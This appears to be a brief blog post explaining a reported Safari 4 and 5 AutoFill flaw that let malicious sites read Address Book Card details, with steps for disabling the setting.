How to Fix Apple Safari’s Autofill Security Threat

Jeremiah Grossman, founder and Chief Technology Officer of WhiteHat Security, discovered a security threat built into Apple’s web browser Safari. With nearly 4.9% of people browsing the web using Safari, this threat may have compromised the web privacy of quite a few people.

Built into Apple’s Safari web browser is a convenient AutoFill feature. This feature allows Safari to remember your usernames, passwords, and personal information. AutoFill is a feature that is found on nearly all web browsers in use today. However, as Grossman points out, not all AutoFill features are created equal. Safari has an alarming AutoFill-related security flaw that all Safari users need to be aware of.


When a Safari user visits a website, users’ personal information can be discovered, even if they had never visited that website or entered any personal information before. A malicious website could gain access to the user’s first and last name, work place, city, state, and email address. This is due to a preference setting in Safari’s AutoFill feature that is activated by default, which is “AutoFill web forms: Using info from my Address Book Card”.

Apparently, when someone visits a website with this setting enabled, their Address Book Card data could be extracted by a malicious website. As seen below, all the website would have to do is “dynamically create from text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill’ed, it can be accessed and sent to the attacker,” explains Grossman.


Safari users need not worry or search for a new browser, due to this security threat. All users need to do to protect themselves is change a simple setting in Safari’s preferences. Here’s how:

  1. Open Safari
  2. Select Safari from then menu bar on the top of the screen
  3. Select Preferences
  4. Select the AutoFill tab
  5. Uncheck “Using info from my Address Book card

That’s it. Note that this security threat is only inherent in Safari Versions 4 and 5. To find out what version you have, select Safari > About Safari in the menu bar.

Via Jeremiah Grossman

Related Posts